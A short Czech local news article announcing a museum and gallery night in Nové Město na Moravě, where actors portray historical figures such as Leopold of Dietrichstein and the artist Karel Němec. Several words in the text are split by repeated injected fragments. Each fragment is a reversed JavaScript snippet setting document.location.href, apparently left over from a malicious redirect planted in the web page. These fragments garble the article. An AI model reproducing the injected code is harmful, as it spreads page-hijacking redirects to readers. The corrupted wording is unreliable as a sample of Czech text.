Rainbow page separator

Noc muzeí veřejnosti přiblíží významné novoměstské osobnosti

Pondělí, 24. května 2021

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Při noci muzeí, galerií a kostelů se mohou setkat milovníci kultury a his[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torie v pátek 28. května v Novém Městě. V rámci akce „ožijí“ tamní významné his[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torické postavy a každou půlhodinu se představí na různých místech náměstí a u evangelického kostela.
Veřejnost se může těšit na setkání s Leopoldem z Ditrichštejna  majitelem novoměstského panství v 17. s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toletí či s významným výtvarníkem Karlem Němcem (1879–1960), tvůrcem sgrafit na kostele svaté Kunhuty. U kašny na náměstí se rovněž setkají středověcí šlechtici Vratislav a Jan z Pernštejna a před městským úřadem se objeví někdejší novoměstský starosta a stavitel Josef Sadílek (1844–1935).
Při novoměstské noci muzeí, galerií a kostelů bude volný vstup do Horácké galerie a Horáckého muzea a v centru města se odehrají krátké doprovodně programy – koncert písničkáře Karla Vepřeka u evangelického kostela a ekumenická bohoslužba při svíčkách v parku na náměstí.